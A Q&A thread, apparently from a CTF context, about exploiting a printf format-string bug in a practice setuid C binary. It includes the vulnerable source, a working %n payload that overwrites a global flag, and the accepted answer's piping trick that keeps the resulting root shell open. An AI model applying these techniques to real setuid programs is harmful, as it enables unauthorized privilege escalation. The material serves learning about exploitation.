# Setuid binary to spawn root shell by overriding %n, does not work with exploit but works when exploit is unnecessary

Tags: c, linux, bash, setuid, ctf

I have a Setuid binary that has a printf format string vulnerability that is supposed to be exploited with "%n" to overwrite the value of the `authenticated` global variable. The execution of /bin/bash works with root Setuid permissions when `authenticated = 1`, but not when `authenticated = 0` and the exploit is used.

I have tried with `ls` and it works, so the exec is happening. I have also tried making `authenticated = 1` in the source so it automatically runs bash with no exploit. This works in spawning a root shell. When the exploit is used, the program calls the access granted function as expected, but ends at the exec and perror is never reached. The parent process dies, though, meaning the exec of bash must have happened. Bash must be being executed, but it is crashing/exiting on startup.

```
#define _GNU_SOURCE
#include <stdio.h>
#include <stdlib.h>
#include <stdint.h>
#include <string.h>
#include <unistd.h>
#include <sys/types.h>
#include <sys/wait.h>
#include <errno.h>

int authenticated = 0;


void read_flag() {
  if (!authenticated) {
    printf("Sorry, you are not *authenticated*!\n");
  }
  else {
    printf("Access Granted.\n");
    int cpid = fork();
    if(cpid == 0){
      printf("child!\n");
      execlp("/bin/bash", "bash", NULL);
      perror("error");
    }
    else{
      wait(NULL);
    }
  }

}

int main(int argc, char **argv) {

  setvbuf(stdout, NULL, _IONBF, 0);

  char buf[64];

  // Set the gid to the effective gid
  // this prevents /bin/sh from dropping the privileges
  setreuid(geteuid(), getuid());

  printf("Would you like a shell? (yes/no)\n");

  fgets(buf, sizeof(buf), stdin);

  if (strstr(buf, "no") != NULL) {
    printf("Okay, Exiting...\n");
    exit(1);
  }
  else if (strstr(buf, "yes") == NULL) {
    puts("Received Unknown Input:\n");
    printf(buf);
  }

  read_flag();

}
```

With authenticated = 0, I use gdb to find the address of `authenticated` is somewhere like 0x0804a050. I run the program with AAAA %x %x %x... to find that `buf` begins at the 4th stack position. My exploit then is: `python -c "print('\x50\xa0\x04\x08%x%x%x%n')"` which successfully overwrites the global var as "Access Granted!" is printed. The perror is never reached, and Bash must spawn, but the parent process dies, so the Bash process must have died also.
This does not happen when `authenticated = 1`. In that scenario, the Setuid binary behaves as expected and pops a root shell.

My question is: why is Bash dying on startup but only when the Detuid binary is exploited?
Bash must be dying because `ps -aux` does not list a new Bash process, and running `exit` exits the calling bash instance.

Comment: How are you invoking the program?

Comment: program is invoked as local privilege escalation as an unpriv user. Binary is owned by root and has 6777 permissions, so the `setreuid(...)` should execute the /bin/bash as the file owner aka root

Comment: No, what are you typing into your shell in order to execute your exploit?

Comment: have tried piping it out of a file as in `./vuln < myPayload` and have tried inline python execution `python -c "print('\x50\xa0\x04\x08%x%x%x%n')" | ./vuln`

Answer (score 6, accepted):

When you run one of:

```
python -c "print('\x50\xa0\x04\x08%x%x%x%n')" | ./vuln
./vuln < myPayload
```

The only input is your exploit. You don't input any commands, so bash has nothing to do and exits. This is the same thing that happens if you run `true | bash` or `bash < /dev/null`.

If you want to be able to type in some commands manually afterwards, the easiest way to do that is:

```
{ python -c "print('\x50\xa0\x04\x08%x%x%x%n')"; cat; } | ./vuln
```

Comment: Thank you so much! I've been staring at this for much more time than I'd like to admit. I had no idea it was that simple!